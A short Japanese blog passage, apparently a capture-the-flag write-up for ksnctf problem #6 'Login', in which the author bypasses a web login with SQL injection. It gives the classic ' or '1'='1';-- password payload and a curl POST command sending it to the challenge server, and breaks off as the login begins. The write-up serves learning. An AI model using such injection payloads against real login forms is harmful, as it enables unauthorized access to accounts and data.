~ksnctfを解いてみる~ #6 Login

ksnctfの6問目(順不同で目についたの適当に解いてる)。 Webのログインページからログインする問題のようだ。

とりあえずSQLインジェクションっぽいので、指示通りユーザにadminを指定してお約束的にSQLインジェクションをパスワードのとこに入力。

```
' or '1' = '1';--
```

ログイン時のsqlインジェクションをcurlでやった場合はこんな感じ。

curl -X POST http://ctfq.sweetduet.info:10080/~q6/ -d "id=admin" -d "pass=' or 'a'='a';--"

ログインする...